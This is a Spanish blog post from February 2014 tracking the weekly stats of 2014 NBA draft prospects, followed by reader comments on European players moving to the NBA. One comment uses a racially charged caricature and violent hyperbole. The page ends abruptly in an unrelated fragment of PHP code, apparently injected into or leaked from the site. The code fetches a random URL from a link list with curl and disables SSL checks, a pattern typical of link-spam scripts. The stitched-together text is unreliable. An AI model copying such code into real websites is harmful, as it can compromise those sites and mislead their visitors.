Seguimiento del Draft 2014: Semana del 17 al 23 de Febrero

24 de February de 2014 por Viva_Dirk

Kansas Jayhawks: Balance de 2-0 para ellos. Andrew Wiggins decidió el partido contra Texas Tech con una bandeja a falta de 2 segundos y finalizó el partido con 19 puntos y 6 rebotes mientras que en la paliza del sábado acabó con 21-6. También jugó muy bien ambos partidos Joel Embiid con 18-8 en el primero y 13-7 y 6 tapones en el segundo. En cambio, Wayne Selden Jr tuvo un día pésimo frente Texas Tech que medio compensó el sábado con un completo 8-6-7.

Duke Blue Devils: Balance de 2-1 para los Blue Devils pero con victoria frente a Syracuse incluida. Jabari Parker sigue a gran nivel y promedió 17,3 puntos y 11,6 rebotes. Su compañero Rodney Hood anotó 14,3 puntos por noche.

Kentucky Wildcats: 2-0 para los Wildcats. Tremendo partido de Julius Randle el martes ante Ole Miss: 25 puntos (6 de 7), 13 rebotes y un robo. El sábado se quedó en 8 puntos pero cogió 15 rebotes. Muy bien también James Young con 18 puntos y 5,5 rebotes de media. Algo mejor que en anteriores semanas estuvo Willie Cauley-Stein con 7,5 puntos, 6 rebotes y 3 tapones. El sophomore Alex Poythress, proyectado en segunda ronda, anotó 5,5 puntos.

Oklahoma State Cowboys: Balance de 1-1 esta semana. Marcus Smart volvió el sábado con nada menos que 16 puntos, 10 asistencias y 6 robos de balón. Su compañero Markel Brown proyectado en 2ª ronda promedió 18,5 puntos, 5 rebotes y 5,5 asistencias.

Indiana Hoosiers: Solo un partido para los Hoosiers esta semana ya que se aplazó el del martes. El del sábado acabó con victoria y un sólido 12-8 de Noah Vonleh

Arizona Wildcats: 2-0 para los Wildcats. El miércoles, pésimo partido de Aaron Gordon que se quedó en 3 puntos, 3 rebotes, 5 pérdidas y 5 faltas en 20 minutos de juego. En cambio, el sábado ante Colorado Gordon se marcó un partidazo con 23-8. Actuaciones tan irregulares parecen dar la razón a los que piensan que un año más en la universidad le haría mucho mejor jugador.

Syracuse Orange: Primera derrota de la temporada de los Orange en un escenario realmente inesperado: en casa contra Boston College. Y eso que tanto Tyler Ennis (14-8-6) y Jerami Grant (11-6-3 y 4 robos)  jugaron un buen partido. En el segundo contra Duke llegó otra derrota. En esta ocasión el base tuvo un día negado de cara al aro con un 2 de 13 en tiros a pesar de lo cual jugó los 40 minutos y acabó con 9-4-6 y 4 robos. Mientras Grant se pegaba con Parker y aún así podía acabar con con 17 puntos y 8 rebotes.

Michigan State Spartans: 1-1 para los Spartans. El jueves consiguiero la victoria ante Purdue con Gary Harris luciéndose (25-3-3, 3 robos y 6 triples) y el center Andreian Payne anotando (23 puntos con 4 triples). Anoche, sin embargo, derrota ante los Wolverines con 21 puntos de Harris y 12-11 para Payne.

Resto de jugadores de 1era ronda

En  general, buenos partidos de todos los implicados. Doug McDermott sigue con lo suyo. Si el miércoles consiguió 25 puntos (con un 9 de 12 en tiros), 8 rebotes y 3 asistencias en la victoria de su equipo ante Marquette, ayer 29 puntos que le colocan ya como uno de los 10 máximos anotadores de la historia del baloncesto universitario. Ayer mismo, los Wolverines se impusieron a Michigan State con 25 puntos y 5 asistencias de Nik Stauskas y se colocan primeros en la Big Ten. Por su parte, KJ McDaniels acaba la semana con 14 puntos, 4’5 rebotes, 2 robos y 4 tapones. Buena actuación también de Sam Dekker, de Wisconsin, con 15 puntos y 11 rebotes en la victoria frente Iowa. Sigue muy regular en sus actuaciones el ala-pívot Montrezl Harrell con 17’5 puntos y 7 rebotes. TJ Warren mantiene un altísimo nivel de anotación y esta semana se ha ido a los 25’5 puntos de promedio a los que ha sumado 5’5 rebotes. Kyle Anderson sigue mostrando sus particularidades y nos dejó una hoja de 8’5- puntos, 7 rebotes, 8 asistencias, 3 robos y 3’5 pérdidas. El base de Nevada, Deonte Burton  ha protagonizado una considerable subida en los mocks pese a no destacar en exceso. Esta semana ha promediado 17’5 puntos y 4’5 asistencias. Algo por debajo de sus números ha estado CJ Wilcox con 16 puntos.

Segunda ronda

Jahii Carson sigue subiendo poco a poco en los mocks a pesar de que esta semana ha estado muy pco afortunado de cara al aro. Em miércoles ante Colorado anotó 18 puntos pero con un 5 de 15 y ayer lo hizo aún peor: se quedó en 8 puntos con un 3 de 13. El center de Purdue AJ Hammons ha tenido una semana floja con 7 puntos y 4’5 rebotes de media. Al menos ayer puso 4 gorros ante Nebraska. Jordan Clarkson estuvo en 17’5 puntos y 5’5 rebotes, mientras que su compañero Jabari Brown, ambos de Missouri, dejó 16’5 puntos y 4 asistencias. Semaj Christon calcó sus números de la temporada con 16 puntos y 4’5 asistencias mientras que Elfrid Payton con 14 puntos, 7’5 asistencias y 4 pérdidas se quedó lejos de sus media. Tampoco fue la semana de Dwight Powell que se quedó en 11.5-4-4. Russ Smith dejó 14’5 puntos y 4 rebotes y Lousville ganó los 2 partidos de la semana. Gran actuación de Roy Devyn Marble ante Wisconsin con 21 puntos, 4 rebotes y 11 asistencias. LaQuinton Ross hizo 12’5-6 y su compañero Aaron Craft 10-4-4 y 4 robos para Oklahoma State. Cory Jefferson fue uno de los jugadores de la semana con 20 puntos, 12.5 rebotes y 2.5 tapones y cerca de esos números estuvo Jarnell Stokes con 18 puntos, 13.5 rebotes y 3 tapones.

Jugadores internacionales

Dario Saric dejó una nueva exhibición: 20 puntos, 14 rebotes y 9 asistencias para este forward que llama a las puertas del top10 pero que del que últimamente está sonando que podría pasar por España antes de aterrizar en la NBA. Tampoco estuvo nada mal el partido de Jusuf Nurkic con 16 puntos y 15 rebotes. Bogdan Bogdanovic jugó muy bien en la Euroliga (23 puntos, 6 rebotes, 6 asistencias y 2 robos) pero mal en la liga Adriática (9 puntos con un 4 de 19). Clint Capela también se dejó ver con 10 puntos, 17 rebote y 2 tapones, mientras que Walter Tavares anotó 13 puntos. Vasilije Micic y Alessandro Gentile han sido baja por lesión.

Comenta

7 comentarios a esta entrada

  1. Esteban dice:
    #1

    sacando a Embidd, no parece ser tan grandioso este draft, parker es de lo mejor y no domina la liga como si lo hiciera melo en su momento

    no se, me da que tampoco es para tanto

      Citar

  2. Sancho88 dice:
    #2

    Que ni se le ocurra a Saric pasarse por España. Sería su tumba, igual que Mirotic. Iros allí a jugar joder, como dice Spahija, ex de la Cibona este año, por lo tanto ha entrenado a Saric, vete allí y te harán un gran jugador como Antetokoumpo. Solo hay que ver al griego, en verano parecía un paquete en el eurobasket sub 19 y ahora nos parece un proyecto de megacrack. Pues Saric y Mirotic se deberían dejar de hostias y largarse. Es impresionante que la NBA reclama jugadores y muchos se acojonan. Mirotic está retrasando su eclosión, se ha encabezonado con ganar la Euroliga y habría que decirle que ni Pau, ni Nowitzki ni Parker la tienen y sin embargo son los tres mejores jugadores europeos de la historia. Sobre la NCAA, hay ganas de que empiece la locura de Marzo, todos contra todos. Ojito con los Jayhawks porque Embiid está empezando a carburar. Si consigue mejorar físicamente estamos hablando de un gran jugador, pero es básico que se ponga fuerte para ir a la NBA y dominar. Parece que cabeza y facultades no le faltan

      Citar

  3. txusma dice:
    #3

    Leer “mejores jugadores europeos de la historia” y no los nombres de Sabonis o Petrovic me deja un poco patidifuso.
    De todas maneras, es verdad q ahora mismo no me viene a la cabeza ningún jugador que haya sido un grande en Europa que haya llegado a la NBA y haya triunfado con todas las de la ley. Gasol se fue dominando España, Nowitzki y Parker eran unos desconocidos, los Spanoulis, Jasikevicius, Navarro, etc… no cuajaron. Petrovic estaba camino de conseguirlo pero la fatalidad se cruzó en su camino. Veremos si Mirotic lo consigue (pq yo creo q ya se puede considerar q es de los grandes de Europa). Tal vez no vale la pena acomodárse en el viejo continente.

      Citar

  4. Denise dice:
    #4

    txusma:
    Leer “mejores jugadores europeos de la historia” y no los nombres de Sabonis o Petrovic me deja un poco patidifuso.

    Hombre, se referirá en la NBA. Sabonis llegó ya viejo, y la carrera de Petrovic fue corta
    Yo estoy de acuerdo con Sancho en ese aspecto, en mi opinión, el 4º sería Stojakovic y el 5º Kukoc

      Citar

  5. Lucho dice:
    #5

    Ginobili no sirve como contraejemplo? Vale que no es eutopeo, pero dominó Europa antes de ir a USA

      Citar

  6. Sancho88 dice:
    #6

    Bueno, cierto lo que dices Lucho. Como ejemplo de extranjero sí serviría Ginobili. Era un jugador mágico en el Kinder que dominó Europa. Con respecto a lo de Petrovic y Sabonis, por supuesto Txus que los tenía en mi cabeza, sobre todo al Zar que es al que yo vi jugar, Petrovic me pilló muy pequeño. Pero era para ilustrar ese ejemplo de tres jugadores coetaneos a todos nosotros (incluso a Melo) que no han tenido la necesidad de triunfar aquí para llegar hechos allí. Hay dos opciones, síndrome Bodiroga y síndrome Gortat, y en ninguna de ellas encajan ni MIrotic ni Saric. Saric es puro hype, y lo tiene que aprovechar como ha hecho Exum, que incluso es mucho más desconocido. Un chaval que para mí se puede comparar con Ricky Rubio por impacto en Europa y que en la NBA podría hacer las delicias como 3-4. Y Mirotic… ufff, fue puro hype hace dos años, ahora ya es… “se te está empezando a pasar el arroz Mirotic”. O va ya o se estancará como cualquier hijo de vecino. De hecho, para mí ya está en ese modo de asco e indiferencia que le ocurrió a Ricky en el Barsa. O se va ahora o acabará en el pozo de los donnadies. Sigo flipando como pueden seguir engañando a tantos talentos europeos de que se tienen que quedar aquí para hacerse hombres que si no en la NBA no van a hacer nada y bla bla bla… algunos como Mirotic se lo creen desgraciadamente.

    Raduljica puede ser síndrome Gortat, Jasikevicius, Macijauskas, Spanoulis, etc. son síndrome Bodiroga, Garbajosa y Antic son síndrome Sabonis… Shved era un hyper descarado que para mí sigue siendo una mierda y lo dije el año pasado cuando fue, no soy sospechoso de inventarme esto.

    Explicación de los síndromes:

    Síndrome Gortat: No le conocían ni en su casa y al final muchos equipos de la NBA se pegan por tenerlo. Hay maromos europeos que les pasa esto, el último Antetokoumpo. El penúltimo Vucevic.

    Síndrome Bodiroga: Soy dios en Europa pero voy a América y lloro y digo… mamá, los negros no me la pasan, no quieren jugar conmigo. Aquí en este síndrome entran grandes leyendas que ya he enumerado anteriormente.

    Síndrome Sabonis. Soy el jefe en Europa, no me queda nada por hacer aquí, he ganado ligas, algunas veces euroligas y ahora me voy a la NBA porque me da la gana y porque os voy a enseñar algunas cosas que he aprendido en Europa y que allí no sabéis hacer. Ciertamente aquí pondría también a Navarro y a Anthony Parker.

    Resumiendo: Micic se tiene que quedar un año más (que mire a su compañero de selección Nedovic y vea el hostión que se ha pegado, son casos similares a mi juicio), Capela o se va este verano o será un pakete en Europa. Tavares también. Nogueria también. Abrines lo doy por perdido, esos bracines de betty spaghuetti me dan ganas de matarlo, Hezonja que se pire del Barsa. Tiene un año para conservar su hype. Todorovic está perdido, Domantas se debería ir al Zalgiris a cultivar bien su hype, y llegamos a Mirotic y Saric, las perlas de la corona. Estos dos se tienen que ir ya. Mirotic porque lo quieren ahora, no el año que vene, y Saric porque en el madrid o barsa pueden ir gente como Singler, Muscalas… gentecilla así. Fredette habría estado bien que se hubiera venido un año… Vesely a lo mejor… pero Saric? Oh my got, con ese baloncesto que tiene en la cabeza… podrían meterle los planos de prison break y se los aprendería de memoria. A mí me encanta. Para mí por conocimiento de juego y plasticidad de lo que un entrenador puede hacer con él me recuerda a McLemore. Son jugadores que son una bendición para el entrenador, porque les gusta defender, son solidarios, inteligentes, saben cuando dinamitar los partidos, te ganan ese rebote ofensivo clave cuando faltan 10 segundos que luego te da la victoria tras el tiro de un Nowitzki, por ejemplo… Son jugadores muy valiosos

      Citar

  7. txusma dice:
    #7

    Que conste en acta que yo creo que tanto Mirotic y Saric deberían ir ya. Si MIrotic se va ganando la Euroliga mejor que mejor pero q deje de perder tiempo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>